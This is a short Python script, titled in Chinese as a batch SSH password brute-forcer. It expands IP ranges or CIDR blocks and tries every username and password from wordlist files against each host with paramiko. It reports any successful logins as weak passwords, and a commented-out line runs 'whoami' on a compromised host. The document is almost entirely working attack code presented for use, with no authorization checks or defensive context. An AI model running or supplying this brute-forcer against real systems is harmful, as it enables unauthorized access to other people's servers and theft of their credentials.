批量爆破SSH密码 python脚本

import paramiko
import re
from IPy import IP
import sys,ftplib,socket
my_re = re.compile(r'[A-Za-z]',re.S)

# 读取文件
def open_file(file_name):
    data = []
    try :
        for line in open(file_name):
            test = line.strip('\n')
            data.append(test)
        return data
    except IOError:
        print("[-]文件名："+file_name+'读取异常')
        return data
def IPs(ip):
    res = re.findall(my_re, ip)
    if len(res) == 0: #判断是否存在英文字符，如果没有，直接进行IP操作，如果有，进行文件读取操作
        IPS = []
        s1 = "/"
        s2 = "-"
        if ip.find(s1) > 0:#如果传入的字符串满足192.168.10.0/24这种形式，则调用IP库进行处理
            ip1 = IP(ip)
            for i in ip1:
                IPS.append(i)
        elif (str(ip).find(s2)) > 0:
            for i in range(int(str(ip)[str(ip).rfind('.') + 1:str(ip).rfind('-')]),
                           int(str(ip)[str(ip).rfind('-') + 1:]) + 1):
                IPS.append(str(ip)[:str(ip).rfind('.') + 1] + str(i))
        return IPS
    else:
        return open_file(ip)
def ssh(ip,port,username,passwd):
    ips = IPs(ip)
    user = open_file(username)
    password = open_file(passwd)
    #三层嵌套for循环，检测密码是否正确
    for i in ips :
        for j in user :
            for k in password:
                ssh = paramiko.SSHClient()
                ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  # 跳过了远程连接中选择‘是’的环节,
                try:
                    print('[*]正在检测 用户名：' +j +",密码：" + k )
                    ssh.connect(i, int(port), j, k)
                    print('[!]检测到弱口令，主机：' + i +",用户名："+j+"密码："+k )
                    # stdin, stdout, stderr = ssh.exec_command('whoami')
                    # print(str(stdout.read(),'utf-8'))
                except paramiko.ssh_exception.AuthenticationException:
                    pass
                except paramiko.ssh_exception.SSHException:
                    pass
#ssh("192.168.154.134-135",22,"username.txt",'passwd.txt')